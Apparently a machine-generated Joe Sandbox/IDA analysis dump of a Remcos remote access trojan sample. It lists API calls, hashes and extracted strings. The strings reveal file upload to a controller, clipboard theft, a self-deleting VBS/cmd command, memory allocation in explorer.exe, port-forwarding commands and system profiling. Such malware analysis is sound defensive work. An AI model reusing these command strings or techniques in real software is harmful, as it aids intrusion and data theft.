                                          • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                          • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                          • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                          • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                          • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                          • __aulldiv.LIBCMT ref: 00408D88
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                          Similarity
                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF
                                          • API String ID: 3086580692-731956494
                                          • Opcode ID: 966f2b8a52828e5852c36c7200f095a726508005ada64ea9ce90e921c0413125
                                          • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                          • Opcode Fuzzy Hash: 966f2b8a52828e5852c36c7200f095a726508005ada64ea9ce90e921c0413125
                                          • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open$xdF
                                          • API String ID: 1913171305-3121233398
                                          • Opcode ID: a6785ec93dcaa828c2725d5a80a16d8a1d64272e6ee7c762ad3af656f080ac9c
                                          • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                          • Opcode Fuzzy Hash: a6785ec93dcaa828c2725d5a80a16d8a1d64272e6ee7c762ad3af656f080ac9c
                                          • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                          Similarity
                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                          • String ID: \ws2_32$\wship6$getaddrinfo
                                          • API String ID: 2490988753-3078833738
                                          • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                          • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                          • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                          • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                          • _free.LIBCMT ref: 0045137F
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004513A1
                                          • _free.LIBCMT ref: 004513B6
                                          • _free.LIBCMT ref: 004513C1
                                          • _free.LIBCMT ref: 004513E3
                                          • _free.LIBCMT ref: 004513F6
                                          • _free.LIBCMT ref: 00451404
                                          • _free.LIBCMT ref: 0045140F
                                          • _free.LIBCMT ref: 00451447
                                          • _free.LIBCMT ref: 0045144E
                                          • _free.LIBCMT ref: 0045146B
                                          • _free.LIBCMT ref: 00451483
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                          Similarity
                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                          • String ID:
                                          • API String ID: 3658366068-0
                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                          APIs
                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                          • GetLastError.KERNEL32 ref: 00455D6F
                                          • __dosmaperr.LIBCMT ref: 00455D76
                                          • GetFileType.KERNEL32(00000000), ref: 00455D82
                                          • GetLastError.KERNEL32 ref: 00455D8C
                                          • __dosmaperr.LIBCMT ref: 00455D95
                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                          • GetLastError.KERNEL32 ref: 00455F31
                                          • __dosmaperr.LIBCMT ref: 00455F38
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                          Similarity
                                          • API ID: _free
                                          • String ID: \&G$\&G$`&G
                                          • API String ID: 269201875-253610517
                                          • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                          • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                          Similarity
                                          • API ID:
                                          • String ID: 65535$udp
                                          • API String ID: 0-1267037602
                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                          APIs
                                          • OpenClipboard.USER32 ref: 0041697C
                                          • EmptyClipboard.USER32 ref: 0041698A
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Similarity
                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                          • String ID: !D@$xdF
                                          • API String ID: 2172192267-3540039394
                                          • Opcode ID: 6e7a658acb981bf194e97a1bd3e3b97bf04fb426e11316d22ad3474e21385c8b
                                          • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                          • Opcode Fuzzy Hash: 6e7a658acb981bf194e97a1bd3e3b97bf04fb426e11316d22ad3474e21385c8b
                                          • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                          • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                          • __dosmaperr.LIBCMT ref: 0043A926
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                          • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                          • __dosmaperr.LIBCMT ref: 0043A963
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                          • _free.LIBCMT ref: 0043A9C3
                                          • _free.LIBCMT ref: 0043A9CA
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                          • TranslateMessage.USER32(?), ref: 0040557E
                                          • DispatchMessageA.USER32(?), ref: 00405589
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          APIs
                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Similarity
                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                          • String ID: <$@$@VG$@VG$Temp
                                          • API String ID: 1704390241-1291085672
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe), ref: 004074D9
                                          Similarity
                                          • API ID: CurrentProcess
                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@
                                          • API String ID: 2050909247-1783200977
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                          • int.LIBCPMT ref: 00410EBC
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                          • String ID: <kG$@!G$@kG
                                          • API String ID: 3815856325-4100743575
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          APIs
                                          • _free.LIBCMT ref: 004481B5
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004481C1
                                          • _free.LIBCMT ref: 004481CC
                                          • _free.LIBCMT ref: 004481D7
                                          • _free.LIBCMT ref: 004481E2
                                          • _free.LIBCMT ref: 004481ED
                                          • _free.LIBCMT ref: 004481F8
                                          • _free.LIBCMT ref: 00448203
                                          • _free.LIBCMT ref: 0044820E
                                          • _free.LIBCMT ref: 0044821C
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C738
                                          • DisplayName, xrefs: 0041C7CD
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                          • API String ID: 1332880857-3614651759
                                          APIs
                                          Similarity
                                          • API ID: Eventinet_ntoa
                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$xd
                                          • API String ID: 3578746661-3766644089
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                          • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                          Similarity
                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                          • API String ID: 489098229-3790400642
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleep
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 1462127192-2001430897
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                          • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                          • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID: Remcos
                                          • API String ID: 1970332568-165870891
                                          • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                          • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                          • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                          • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                          • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                          • __freea.LIBCMT ref: 00454083
                                          • __freea.LIBCMT ref: 0045408F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                          • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
